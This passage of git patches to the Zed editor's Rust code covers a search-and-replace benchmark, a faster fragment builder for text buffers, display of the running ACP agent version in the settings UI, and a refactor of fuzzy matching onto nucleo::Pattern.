positional.remove(0); + parsed.query = positional.remove(0); + parsed +} + +fn main() { + let args = parse_args(); + + let file_contents = std::fs::read_to_string(&args.file).expect("failed to read input file"); + let file_len = file_contents.len(); + println!("Read {} ({file_len} bytes)", args.file); + + let mut query = if args.regex { + SearchQuery::regex( + &args.query, + args.whole_word, + args.case_sensitive, + false, + false, + Default::default(), + Default::default(), + false, + None, + ) + .expect("invalid regex query") + } else { + SearchQuery::text( + &args.query, + args.whole_word, + args.case_sensitive, + false, + Default::default(), + Default::default(), + false, + None, + ) + .expect("invalid text query") + }; + + if let Some(replacement) = args.replace.as_deref() { + query = query.with_replacement(replacement.to_string()); + } + + let query = Arc::new(query); + let has_replacement = args.replace.is_some(); + + gpui_platform::headless().run(move |cx| { + release_channel::init_test( + semver::Version::new(0, 0, 0), + release_channel::ReleaseChannel::Dev, + cx, + ); + settings::init(cx); + theme::init(theme::LoadThemes::JustBase, cx); + editor::init(cx); + + let buffer = cx.new(|cx| Buffer::local(file_contents, cx)); + + let window_handle = cx + .open_window( + WindowOptions { + window_bounds: Some(WindowBounds::Windowed(gpui::Bounds { + origin: Default::default(), + size: gpui::size(gpui::px(800.0), gpui::px(600.0)), + })), + focus: false, + show: false, + ..Default::default() + }, + |window, cx| cx.new(|cx| Editor::for_buffer(buffer, None, window, cx)), + ) + .expect("failed to open window"); + + window_handle + .update(cx, move |_, window, cx| { + cx.spawn_in( + window, + async move |weak: WeakEntity, + cx: &mut AsyncWindowContext| + -> anyhow::Result<()> { + let find_task = weak.update_in(cx, |editor, window, cx| { + editor.find_matches(query.clone(), window, cx) + })?; + + println!("Finding matches..."); + let timer = std::time::Instant::now(); + 
let matches: Vec> = find_task.await; + let find_elapsed = timer.elapsed(); + println!("Found {} matches in {find_elapsed:?}", matches.len()); + + if has_replacement && !matches.is_empty() { + window_handle.update(cx, |editor: &mut Editor, window, cx| { + let mut match_iter = matches.iter(); + println!("Replacing all matches..."); + let timer = std::time::Instant::now(); + editor.replace_all( + &mut match_iter, + &query, + Default::default(), + window, + cx, + ); + let replace_elapsed = timer.elapsed(); + println!( + "Replaced {} matches in {replace_elapsed:?}", + matches.len() + ); + })?; + } + + std::process::exit(0); + }, + ) + .detach(); + }) + .unwrap(); + }); +} diff --git a/crates/multi_buffer/src/multi_buffer.rs b/crates/multi_buffer/src/multi_buffer.rs index de0a43bac914a8..74eaeef53ebf1a 100644 --- a/crates/multi_buffer/src/multi_buffer.rs +++ b/crates/multi_buffer/src/multi_buffer.rs @@ -5258,6 +5258,16 @@ impl MultiBufferSnapshot { Some(Anchor::in_buffer(path_key_index, anchor)) } + /// Lifts a buffer anchor range to a multibuffer anchor range without checking against excerpt boundaries. Returns `None` if there are no excerpts for the buffer. + pub fn anchor_range_in_buffer(&self, range: Range) -> Option> { + if range.start.buffer_id != range.end.buffer_id { + return None; + } + + let path_key_index = self.path_key_index_for_buffer(range.start.buffer_id)?; + Some(Anchor::range_in_buffer(path_key_index, range)) + } + /// Creates a multibuffer anchor for the given buffer anchor, if it is contained in any excerpt. 
pub fn anchor_in_excerpt(&self, text_anchor: text::Anchor) -> Option { let excerpts = { @@ -5295,6 +5305,19 @@ impl MultiBufferSnapshot { &self, text_anchor: Range, ) -> Option> { + if self.is_singleton() { + let excerpt = self.excerpts.first()?; + let buffer_snapshot = excerpt.buffer_snapshot(self); + if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) + && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) + { + return Some(Anchor::range_in_buffer(excerpt.path_key_index, text_anchor)); + } + } + + // for each search match + + let mut buffer_snapshot = None; for excerpt in { let this = &self; let buffer_id = text_anchor.start.buffer_id; @@ -5316,7 +5339,8 @@ impl MultiBufferSnapshot { .into_iter() .flatten() } { - let buffer_snapshot = excerpt.buffer_snapshot(self); + let buffer_snapshot = + buffer_snapshot.get_or_insert_with(|| excerpt.buffer_snapshot(self)); if excerpt.range.contains(&text_anchor.start, &buffer_snapshot) && excerpt.range.contains(&text_anchor.end, &buffer_snapshot) { diff --git a/crates/text/src/text.rs b/crates/text/src/text.rs index 026f1272790740..4b947234054f10 100644 --- a/crates/text/src/text.rs +++ b/crates/text/src/text.rs @@ -38,7 +38,7 @@ use std::{ }; pub use subscription::*; pub use sum_tree::Bias; -use sum_tree::{Dimensions, FilterCursor, SumTree, TreeMap, TreeSet}; +use sum_tree::{Dimensions, FilterCursor, SumTree, Summary, TreeMap, TreeSet}; use undo_map::UndoMap; use util::debug_panic; @@ -912,7 +912,8 @@ impl Buffer { let mut new_ropes = RopeBuilder::new(self.visible_text.cursor(0), self.deleted_text.cursor(0)); let mut old_fragments = self.fragments.cursor::(&None); - let mut new_fragments = old_fragments.slice(&edits.peek().unwrap().0.start, Bias::Right); + let mut new_fragments = + FragmentBuilder::new(old_fragments.slice(&edits.peek().unwrap().0.start, Bias::Right)); new_ropes.append(new_fragments.summary().text); let mut fragment_start = old_fragments.start().visible; @@ -1044,7 +1045,7 @@ impl Buffer { 
let (visible_text, deleted_text) = new_ropes.finish(); drop(old_fragments); - self.snapshot.fragments = new_fragments; + self.snapshot.fragments = new_fragments.to_sum_tree(&None); self.snapshot.insertions.edit(new_insertions, ()); self.snapshot.visible_text = visible_text; self.snapshot.deleted_text = deleted_text; @@ -1127,8 +1128,9 @@ impl Buffer { let mut old_fragments = self .fragments .cursor::>(&cx); - let mut new_fragments = - old_fragments.slice(&VersionedFullOffset::Offset(ranges[0].start), Bias::Left); + let mut new_fragments = FragmentBuilder::new( + old_fragments.slice(&VersionedFullOffset::Offset(ranges[0].start), Bias::Left), + ); new_ropes.append(new_fragments.summary().text); let mut fragment_start = old_fragments.start().0.full_offset(); @@ -1291,7 +1293,7 @@ impl Buffer { let (visible_text, deleted_text) = new_ropes.finish(); drop(old_fragments); - self.snapshot.fragments = new_fragments; + self.snapshot.fragments = new_fragments.to_sum_tree(&None); self.snapshot.visible_text = visible_text; self.snapshot.deleted_text = deleted_text; self.snapshot.insertions.edit(new_insertions, ()); @@ -1303,7 +1305,7 @@ impl Buffer { new_text: &str, timestamp: clock::Lamport, insertion_offset: &mut u32, - new_fragments: &mut SumTree, + new_fragments: &mut FragmentBuilder, new_insertions: &mut Vec>, insertion_slices: &mut Vec, new_ropes: &mut RopeBuilder, @@ -2836,6 +2838,39 @@ impl BufferSnapshot { } } +struct FragmentBuilder { + fragments: Vec, + summary: FragmentSummary, +} + +impl FragmentBuilder { + fn new(init: SumTree) -> Self { + Self { + summary: init.summary().clone(), + fragments: init.iter().cloned().collect(), + } + } + fn append(&mut self, items: SumTree, cx: &Option) { + if !items.is_empty() { + self.summary.add_summary(items.summary(), cx); + self.fragments.extend(items.iter().cloned()); + } + } + fn push(&mut self, fragment: Fragment, cx: &Option) { + self.append(SumTree::from_item(fragment, cx), cx); + } + fn to_sum_tree(self, cx: &Option) -> 
SumTree { + if self.fragments.len() > 1024 { + SumTree::from_par_iter(self.fragments, cx) + } else { + SumTree::from_iter(self.fragments, cx) + } + } + fn summary(&self) -> &FragmentSummary { + &self.summary + } +} + struct RopeBuilder<'a> { old_visible_cursor: rope::Cursor<'a>, old_deleted_cursor: rope::Cursor<'a>, From cd876f10730329145aaba40531d74e175646a715 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 6 May 2026 11:35:43 +0200 Subject: [PATCH 222/231] eval_cli: Set global filesystem in eval CLI init (#55862) Some dependency started requiring this, so fixing some runtime errors. Release Notes: - N/A --- crates/eval_cli/src/headless.rs | 1 + 1 file changed, 1 insertion(+) diff --git a/crates/eval_cli/src/headless.rs b/crates/eval_cli/src/headless.rs index 0ddd99e8f8abd9..a5b86f8eec8478 100644 --- a/crates/eval_cli/src/headless.rs +++ b/crates/eval_cli/src/headless.rs @@ -70,6 +70,7 @@ pub fn init(cx: &mut App) -> Arc { git_binary_path, cx.background_executor().clone(), )); + ::set_global(fs.clone(), cx); let mut languages = LanguageRegistry::new(cx.background_executor().clone()); languages.set_language_server_download_dir(paths::languages_dir().clone()); From bcebf01fd27e81f3293de6942ae51acb871fd6cb Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Wed, 6 May 2026 11:36:43 +0200 Subject: [PATCH 223/231] acp: Show running agent version in configuration (#55824) Store the ACP agent version from agent_info and expose it through AgentConnection so the configuration UI can display it for connected agents. Helpful when debugging to know which version is currently running. 
image Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - acp: Show running agent version in the External Agent settings --- crates/acp_thread/src/connection.rs | 4 ++++ crates/agent_servers/src/acp.rs | 20 ++++++++++++++++--- crates/agent_ui/src/agent_configuration.rs | 12 +++++++---- crates/agent_ui/src/agent_connection_store.rs | 7 +++++++ 4 files changed, 36 insertions(+), 7 deletions(-) diff --git a/crates/acp_thread/src/connection.rs b/crates/acp_thread/src/connection.rs index bbb967530e3a5f..41ca3e4c6a6bd1 100644 --- a/crates/acp_thread/src/connection.rs +++ b/crates/acp_thread/src/connection.rs @@ -49,6 +49,10 @@ pub trait AgentConnection { fn telemetry_id(&self) -> SharedString; + fn agent_version(&self) -> Option { + None + } + fn new_session( self: Rc, project: Entity, diff --git a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index 93efddb03d81db..cc467eb8cd0762 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -413,6 +413,7 @@ fn enqueue_notification( pub struct AcpConnection { id: AgentId, telemetry_id: SharedString, + agent_version: Option, connection: ConnectionTo, sessions: Rc>>, pending_sessions: Rc>>, @@ -900,12 +901,15 @@ impl AcpConnection { } }); - let telemetry_id = response - .agent_info + let agent_info = response.agent_info; + let telemetry_id = agent_info + .as_ref() // Use the one the agent provides if we have one - .map(|info| info.name.into()) + .map(|info| SharedString::from(info.name.clone())) // Otherwise, just use the name .unwrap_or_else(|| agent_id.0.clone()); + let agent_version = agent_info + .and_then(|info| 
(!info.version.is_empty()).then(|| SharedString::from(info.version))); let session_list = if response .agent_capabilities @@ -945,6 +949,7 @@ impl AcpConnection { agent_server_store, connection, telemetry_id, + agent_version, sessions, pending_sessions: Rc::new(RefCell::new(HashMap::default())), agent_capabilities: response.agent_capabilities, @@ -978,6 +983,7 @@ impl AcpConnection { Self { id: AgentId::new("test"), telemetry_id: "test".into(), + agent_version: None, connection, sessions, pending_sessions: Rc::new(RefCell::new(HashMap::default())), @@ -1319,6 +1325,10 @@ impl AgentConnection for AcpConnection { self.telemetry_id.clone() } + fn agent_version(&self) -> Option { + self.agent_version.clone() + } + fn new_session( self: Rc, project: Entity, @@ -1984,6 +1994,10 @@ pub mod test_support { self.inner.telemetry_id() } + fn agent_version(&self) -> Option { + self.inner.agent_version() + } + fn new_session( self: Rc, project: Entity, diff --git a/crates/agent_ui/src/agent_configuration.rs b/crates/agent_ui/src/agent_configuration.rs index 39b1302555bebf..67d21211026b0d 100644 --- a/crates/agent_ui/src/agent_configuration.rs +++ b/crates/agent_ui/src/agent_configuration.rs @@ -1135,10 +1135,13 @@ impl AgentConfiguration { id: agent_server_name.clone(), }; - let connection_status = self - .agent_connection_store - .read(cx) - .connection_status(&agent, cx); + let (connection_status, running_version) = { + let connection_store = self.agent_connection_store.read(cx); + ( + connection_store.connection_status(&agent, cx), + connection_store.agent_version(&agent, cx), + ) + }; let restart_button = matches!( connection_status, @@ -1252,6 +1255,7 @@ impl AgentConfiguration { AiSettingItem::new(id, display_name, status, source_kind) .icon(icon) + .when_some(running_version, |this, version| this.detail_label(version)) .when_some(restart_button, |this, button| this.action(button)) .when_some(uninstall_button, |this, button| this.action(button)) } diff --git 
a/crates/agent_ui/src/agent_connection_store.rs b/crates/agent_ui/src/agent_connection_store.rs index a01f19dd0f222b..fb4ae4b1c4b1b0 100644 --- a/crates/agent_ui/src/agent_connection_store.rs +++ b/crates/agent_ui/src/agent_connection_store.rs @@ -97,6 +97,13 @@ impl AgentConnectionStore { .unwrap_or(AgentConnectionStatus::Disconnected) } + pub fn agent_version(&self, key: &Agent, cx: &App) -> Option { + match self.entries.get(key)?.read(cx) { + AgentConnectionEntry::Connected(state) => state.connection.agent_version(), + AgentConnectionEntry::Connecting { .. } | AgentConnectionEntry::Error { .. } => None, + } + } + pub fn active_acp_connections(&self, cx: &App) -> Vec { self.entries .values() From 227837aa68b87ad1a5df4dd37982d7e058d384d9 Mon Sep 17 00:00:00 2001 From: Finn Eitreim <48069764+feitreim@users.noreply.github.com> Date: Wed, 6 May 2026 03:56:20 -0700 Subject: [PATCH 224/231] fuzzy_nucleo: Refactor multi-atom code to use nucleo::Pattern (#55264) refactor of the fuzzy_nucleo string and path matching code, instead of handling the multiple atoms ourselves we can just use `nucleo::Pattern` and abstract that all away. this replaces the for loop in the path/string_match_helper functions. all functionality is exactly the same. basically the same / within some tiny margin of the original. this could enable the use of `nucleo::Pattern::parse` in the future if that was wanted, which allows some extra syntax to activate different matching modes. [more info from deepwiki](https://deepwiki.com/search/how-do-the-different-atom-matc_37e510de-af27-44a1-a52f-3fc367462e6e?mode=fast). I'm pretty sure that enabling that is as simple as switching a `Pattern::new(...)` call with `Pattern::parse(...)`. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/fuzzy_nucleo/src/fuzzy_nucleo.rs | 80 +++++++++ crates/fuzzy_nucleo/src/paths.rs | 210 ++++++++---------------- crates/fuzzy_nucleo/src/strings.rs | 126 +++----------- 3 files changed, 172 insertions(+), 244 deletions(-) diff --git a/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs b/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs index a6b32f6e1cc1b9..9080d102a2e891 100644 --- a/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs +++ b/crates/fuzzy_nucleo/src/fuzzy_nucleo.rs @@ -2,6 +2,9 @@ mod matcher; mod paths; mod strings; +use fuzzy::CharBag; +use nucleo::pattern::{AtomKind, CaseMatching, Normalization, Pattern}; + pub use paths::{ PathMatch, PathMatchCandidate, PathMatchCandidateSet, match_fixed_path_set, match_path_sets, }; @@ -45,6 +48,83 @@ impl LengthPenalty { } } +// Matching is always case-insensitive at the nucleo level — using +// `CaseMatching::Smart` there would *reject* candidates whose capitalization +// doesn't match the query, breaking pickers like the command palette +// (`"Editor: Backspace"` against the action named `"editor: backspace"`). +// `Case::Smart` is honored as a *scoring hint* instead: when the query +// contains uppercase, candidates whose matched characters disagree in case +// are downranked by a per-mismatch penalty rather than dropped. +pub(crate) struct Query { + pub(crate) pattern: Pattern, + /// Non-whitespace query chars in input order, populated only when a smart-case + /// penalty will actually be charged. Aligns 1:1 with the indices appended by + /// `Pattern::indices` (atom-order, needle-order within each atom). 
+ pub(crate) query_chars: Option>, + pub(crate) char_bag: CharBag, +} + +impl Query { + pub(crate) fn build(query: &str, case: Case) -> Option { + if query.chars().all(char::is_whitespace) { + return None; + } + let normalized = query.split_whitespace().collect::>().join(" "); + let pattern = Pattern::new( + &normalized, + CaseMatching::Ignore, + Normalization::Smart, + AtomKind::Fuzzy, + ); + let wants_case_penalty = case.is_smart() && query.chars().any(|c| c.is_uppercase()); + let query_chars = + wants_case_penalty.then(|| query.chars().filter(|c| !c.is_whitespace()).collect()); + Some(Query { + pattern, + query_chars, + char_bag: CharBag::from(query), + }) + } +} + +#[inline] +pub(crate) fn count_case_mismatches( + query_chars: Option<&[char]>, + matched_chars: &[u32], + candidate: &str, + candidate_chars: &mut Vec, +) -> u32 { + let Some(query_chars) = query_chars else { + return 0; + }; + if query_chars.len() != matched_chars.len() { + return 0; + } + candidate_chars.clear(); + candidate_chars.extend(candidate.chars()); + let mut mismatches: u32 = 0; + for (&query_char, &pos) in query_chars.iter().zip(matched_chars) { + if let Some(&candidate_char) = candidate_chars.get(pos as usize) + && candidate_char != query_char + && candidate_char.eq_ignore_ascii_case(&query_char) + { + mismatches += 1; + } + } + mismatches +} + +const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; + +#[inline] +pub(crate) fn case_penalty(mismatches: u32) -> f64 { + if mismatches == 0 { + 1.0 + } else { + SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) + } +} + /// Reconstruct byte-offset match positions from a list of matched char offsets /// that is already sorted ascending and deduplicated. 
pub(crate) fn positions_from_sorted(s: &str, sorted_char_indices: &[u32]) -> Vec { diff --git a/crates/fuzzy_nucleo/src/paths.rs b/crates/fuzzy_nucleo/src/paths.rs index dd4594ce37e522..6aaabfeb50ecb4 100644 --- a/crates/fuzzy_nucleo/src/paths.rs +++ b/crates/fuzzy_nucleo/src/paths.rs @@ -9,12 +9,12 @@ use std::{ use util::{paths::PathStyle, rel_path::RelPath}; use nucleo::Utf32Str; -use nucleo::pattern::{Atom, AtomKind, CaseMatching, Normalization}; +use nucleo::pattern::Pattern; use fuzzy::CharBag; use crate::matcher::{self, LENGTH_PENALTY}; -use crate::{Cancelled, Case, positions_from_sorted}; +use crate::{Cancelled, Case, Query, case_penalty, count_case_mismatches, positions_from_sorted}; #[derive(Clone, Debug)] pub struct PathMatchCandidate<'a> { @@ -96,47 +96,6 @@ impl Ord for PathMatch { } } -// Path matching is always case-insensitive at the nucleo level. `Case::Smart` -// is honored as a *scoring hint*: when the query contains uppercase, candidates -// whose matched characters disagree in case are downranked by a factor per -// mismatch rather than dropped. This keeps `"Editor: Backspace"` matching -// `"editor: backspace"` while still preferring exact-case hits. -const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; - -pub(crate) fn make_atoms(query: &str) -> Vec { - query - .split_whitespace() - .map(|word| { - Atom::new( - word, - CaseMatching::Ignore, - Normalization::Smart, - AtomKind::Fuzzy, - false, - ) - }) - .collect() -} - -// Only populated when we will actually charge a smart-case penalty, so the hot -// path can iterate a plain `&[Atom]` and ignore this slice entirely. 
-fn make_source_words(query: &str, case: Case) -> Option>> { - (case.is_smart() && query.chars().any(|c| c.is_uppercase())).then(|| { - query - .split_whitespace() - .map(|word| word.chars().collect()) - .collect() - }) -} - -fn case_penalty(mismatches: u32) -> f64 { - if mismatches == 0 { - 1.0 - } else { - SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) - } -} - pub(crate) fn distance_between_paths(path: &RelPath, relative_to: &RelPath) -> usize { let mut path_components = path.components(); let mut relative_components = relative_to.components(); @@ -150,34 +109,34 @@ pub(crate) fn distance_between_paths(path: &RelPath, relative_to: &RelPath) -> u path_components.count() + relative_components.count() + 1 } +#[inline] fn get_filename_match_bonus( candidate_buf: &str, - query_atoms: &[Atom], + pattern: &Pattern, matcher: &mut nucleo::Matcher, ) -> f64 { - let filename = match std::path::Path::new(candidate_buf).file_name() { - Some(f) => f.to_str().unwrap_or(""), - None => return 0.0, - }; - if filename.is_empty() || query_atoms.is_empty() { + let Some(filename) = std::path::Path::new(candidate_buf) + .file_name() + .and_then(|f| f.to_str()) + .filter(|f| !f.is_empty()) + else { return 0.0; - } + }; let mut buf = Vec::new(); let haystack = Utf32Str::new(filename, &mut buf); - let mut total_score = 0u32; - for atom in query_atoms { - if let Some(score) = atom.score(haystack, matcher) { - total_score = total_score.saturating_add(score as u32); - } - } - total_score as f64 / filename.len().max(1) as f64 + let score: u32 = pattern + .atoms + .iter() + .filter_map(|atom| atom.score(haystack, matcher)) + .map(|s| s as u32) + .sum(); + + score as f64 / filename.len().max(1) as f64 } fn path_match_helper<'a>( matcher: &mut nucleo::Matcher, - atoms: &[Atom], - source_words: Option<&[Vec]>, - query_bag: CharBag, + query: &Query, candidates: impl Iterator>, results: &mut Vec, worktree_id: usize, @@ -197,7 +156,6 @@ fn path_match_helper<'a>( let path_prefix_len = 
candidate_buf.len(); let mut buf = Vec::new(); let mut matched_chars: Vec = Vec::new(); - let mut atom_matched_chars = Vec::new(); let mut candidate_chars: Vec = Vec::new(); for candidate in candidates { buf.clear(); @@ -206,7 +164,7 @@ fn path_match_helper<'a>( return Err(Cancelled); } - if !candidate.char_bag.is_superset(query_bag) { + if !candidate.char_bag.is_superset(query.char_bag) { continue; } @@ -219,70 +177,45 @@ fn path_match_helper<'a>( let haystack = Utf32Str::new(&candidate_buf, &mut buf); - if source_words.is_some() { - candidate_chars.clear(); - candidate_chars.extend(candidate_buf.chars()); - } - - let mut total_score: u32 = 0; - let mut case_mismatches: u32 = 0; - let mut all_matched = true; - - for (atom_idx, atom) in atoms.iter().enumerate() { - atom_matched_chars.clear(); - let Some(score) = atom.indices(haystack, matcher, &mut atom_matched_chars) else { - all_matched = false; - break; - }; - total_score = total_score.saturating_add(score as u32); - if let Some(source_words) = source_words { - let query_chars = &source_words[atom_idx]; - if query_chars.len() == atom_matched_chars.len() { - for (&query_char, &pos) in query_chars.iter().zip(&atom_matched_chars) { - if let Some(&candidate_char) = candidate_chars.get(pos as usize) - && candidate_char != query_char - && candidate_char.eq_ignore_ascii_case(&query_char) - { - case_mismatches += 1; - } - } - } - } - matched_chars.extend_from_slice(&atom_matched_chars); - } - - if all_matched && !atoms.is_empty() { - matched_chars.sort_unstable(); - matched_chars.dedup(); - - let length_penalty = candidate_buf.len() as f64 * LENGTH_PENALTY; - let filename_bonus = get_filename_match_bonus(&candidate_buf, atoms, matcher); - let positive = (total_score as f64 + filename_bonus) * case_penalty(case_mismatches); - let adjusted_score = positive - length_penalty; - let positions = positions_from_sorted(&candidate_buf, &matched_chars); - - results.push(PathMatch { - score: adjusted_score, - positions, - 
worktree_id, - path: if root_is_file { - Arc::clone(path_prefix) - } else { - candidate.path.into() - }, - path_prefix: if root_is_file { - RelPath::empty().into() - } else { - Arc::clone(path_prefix) - }, - is_dir: candidate.is_dir, - distance_to_relative_ancestor: relative_to - .as_ref() - .map_or(usize::MAX, |relative_to| { - distance_between_paths(candidate.path, relative_to.as_ref()) - }), - }); - } + let Some(score) = query.pattern.indices(haystack, matcher, &mut matched_chars) else { + continue; + }; + + let case_mismatches = count_case_mismatches( + query.query_chars.as_deref(), + &matched_chars, + &candidate_buf, + &mut candidate_chars, + ); + + matched_chars.sort_unstable(); + matched_chars.dedup(); + + let length_penalty = candidate_buf.len() as f64 * LENGTH_PENALTY; + let filename_bonus = get_filename_match_bonus(&candidate_buf, &query.pattern, matcher); + let positive = (score as f64 + filename_bonus) * case_penalty(case_mismatches); + let adjusted_score = positive - length_penalty; + let positions = positions_from_sorted(&candidate_buf, &matched_chars); + + results.push(PathMatch { + score: adjusted_score, + positions, + worktree_id, + path: if root_is_file { + Arc::clone(path_prefix) + } else { + candidate.path.into() + }, + path_prefix: if root_is_file { + RelPath::empty().into() + } else { + Arc::clone(path_prefix) + }, + is_dir: candidate.is_dir, + distance_to_relative_ancestor: relative_to.as_ref().map_or(usize::MAX, |relative_to| { + distance_between_paths(candidate.path, relative_to.as_ref()) + }), + }); } Ok(()) } @@ -296,14 +229,14 @@ pub fn match_fixed_path_set( max_results: usize, path_style: PathStyle, ) -> Vec { + let Some(query) = Query::build(query, case) else { + return Vec::new(); + }; + let mut config = nucleo::Config::DEFAULT; config.set_match_paths(); let mut matcher = matcher::get_matcher(config); - let atoms = make_atoms(query); - let source_words = make_source_words(query, case); - let query_bag = CharBag::from(query); - let 
root_is_file = worktree_root_name.is_some() && candidates.iter().all(|c| c.path.is_empty()); let path_prefix = worktree_root_name.unwrap_or_else(|| RelPath::empty().into()); @@ -312,9 +245,7 @@ pub fn match_fixed_path_set( path_match_helper( &mut matcher, - &atoms, - source_words.as_deref(), - query_bag, + &query, candidates.into_iter(), &mut results, worktree_id, @@ -352,9 +283,9 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( query.to_owned() }; - let atoms = make_atoms(&query); - let source_words = make_source_words(&query, case); - let query_bag = CharBag::from(query.as_str()); + let Some(query) = Query::build(&query, case) else { + return Vec::new(); + }; let num_cpus = executor.num_cpus().min(path_count); let segment_size = path_count.div_ceil(num_cpus); @@ -371,8 +302,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( .zip(matchers.iter_mut()) .enumerate() { - let atoms = atoms.clone(); - let source_words = source_words.clone(); + let query = &query; let relative_to = relative_to.clone(); scope.spawn(async move { let segment_start = segment_idx * segment_size; @@ -389,9 +319,7 @@ pub async fn match_path_sets<'a, Set: PathMatchCandidateSet<'a>>( if path_match_helper( matcher, - &atoms, - source_words.as_deref(), - query_bag, + query, candidates, results, candidate_set.id(), diff --git a/crates/fuzzy_nucleo/src/strings.rs b/crates/fuzzy_nucleo/src/strings.rs index 4f3f02767a8900..b72c7da205da96 100644 --- a/crates/fuzzy_nucleo/src/strings.rs +++ b/crates/fuzzy_nucleo/src/strings.rs @@ -8,61 +8,14 @@ use std::{ use gpui::{BackgroundExecutor, SharedString}; use nucleo::Utf32Str; -use nucleo::pattern::{Atom, AtomKind, CaseMatching, Normalization}; use crate::{ - Cancelled, Case, LengthPenalty, + Cancelled, Case, LengthPenalty, Query, case_penalty, count_case_mismatches, matcher::{self, LENGTH_PENALTY}, positions_from_sorted, }; use fuzzy::CharBag; -// String matching is always case-insensitive at the nucleo level — using 
-// `CaseMatching::Smart` there would reject queries whose capitalization -// doesn't match the candidate, breaking pickers like the command palette -// (`"Editor: Backspace"` against the action named `"editor: backspace"`). -// `Case::Smart` is still honored as a *scoring hint*: when the query -// contains uppercase, candidates whose matched characters disagree in case -// are downranked rather than dropped. -const SMART_CASE_PENALTY_PER_MISMATCH: f64 = 0.9; - -struct Query { - atoms: Vec, - source_words: Option>>, - char_bag: CharBag, -} - -impl Query { - fn build(query: &str, case: Case) -> Option { - let mut atoms = Vec::new(); - let mut source_words = Vec::new(); - let wants_case_penalty = case.is_smart() && query.chars().any(|c| c.is_uppercase()); - - for word in query.split_whitespace() { - atoms.push(Atom::new( - word, - CaseMatching::Ignore, - Normalization::Smart, - AtomKind::Fuzzy, - false, - )); - if wants_case_penalty { - source_words.push(word.chars().collect()); - } - } - - if atoms.is_empty() { - return None; - } - - Some(Query { - atoms, - source_words: wants_case_penalty.then_some(source_words), - char_bag: CharBag::from(query), - }) - } -} - #[derive(Clone, Debug)] pub struct StringMatchCandidate { pub id: usize, @@ -281,7 +234,6 @@ where { let mut buf = Vec::new(); let mut matched_chars: Vec = Vec::new(); - let mut atom_matched_chars = Vec::new(); let mut candidate_chars: Vec = Vec::new(); for candidate in candidates { @@ -297,69 +249,37 @@ where continue; } - let haystack: Utf32Str = Utf32Str::new(&borrowed.string, &mut buf); + let haystack: Utf32Str = Utf32Str::new(borrowed.string.as_ref(), &mut buf); - if query.source_words.is_some() { - candidate_chars.clear(); - candidate_chars.extend(borrowed.string.chars()); - } + let Some(score) = query.pattern.indices(haystack, matcher, &mut matched_chars) else { + continue; + }; - let mut total_score: u32 = 0; - let mut case_mismatches: u32 = 0; - let mut all_matched = true; - - for (atom_idx, atom) in 
query.atoms.iter().enumerate() { - atom_matched_chars.clear(); - let Some(score) = atom.indices(haystack, matcher, &mut atom_matched_chars) else { - all_matched = false; - break; - }; - total_score = total_score.saturating_add(score as u32); - if let Some(source_words) = query.source_words.as_deref() { - let query_chars = &source_words[atom_idx]; - if query_chars.len() == atom_matched_chars.len() { - for (&query_char, &pos) in query_chars.iter().zip(&atom_matched_chars) { - if let Some(&candidate_char) = candidate_chars.get(pos as usize) - && candidate_char != query_char - && candidate_char.eq_ignore_ascii_case(&query_char) - { - case_mismatches += 1; - } - } - } - } - matched_chars.extend_from_slice(&atom_matched_chars); - } + let case_mismatches = count_case_mismatches( + query.query_chars.as_deref(), + &matched_chars, + borrowed.string.as_ref(), + &mut candidate_chars, + ); - if all_matched { - matched_chars.sort_unstable(); - matched_chars.dedup(); + matched_chars.sort_unstable(); + matched_chars.dedup(); - let positive = total_score as f64 * case_penalty(case_mismatches); - let adjusted_score = - positive - length_penalty_for(borrowed.string.as_ref(), length_penalty); - let positions = positions_from_sorted(borrowed.string.as_ref(), &matched_chars); + let positive = score as f64 * case_penalty(case_mismatches); + let adjusted_score = + positive - length_penalty_for(borrowed.string.as_ref(), length_penalty); + let positions = positions_from_sorted(borrowed.string.as_ref(), &matched_chars); - results.push(StringMatch { - candidate_id: borrowed.id, - score: adjusted_score, - positions, - string: borrowed.string.clone(), - }); - } + results.push(StringMatch { + candidate_id: borrowed.id, + score: adjusted_score, + positions, + string: borrowed.string.clone(), + }); } Ok(()) } -#[inline] -fn case_penalty(mismatches: u32) -> f64 { - if mismatches == 0 { - 1.0 - } else { - SMART_CASE_PENALTY_PER_MISMATCH.powi(mismatches as i32) - } -} - #[inline] fn 
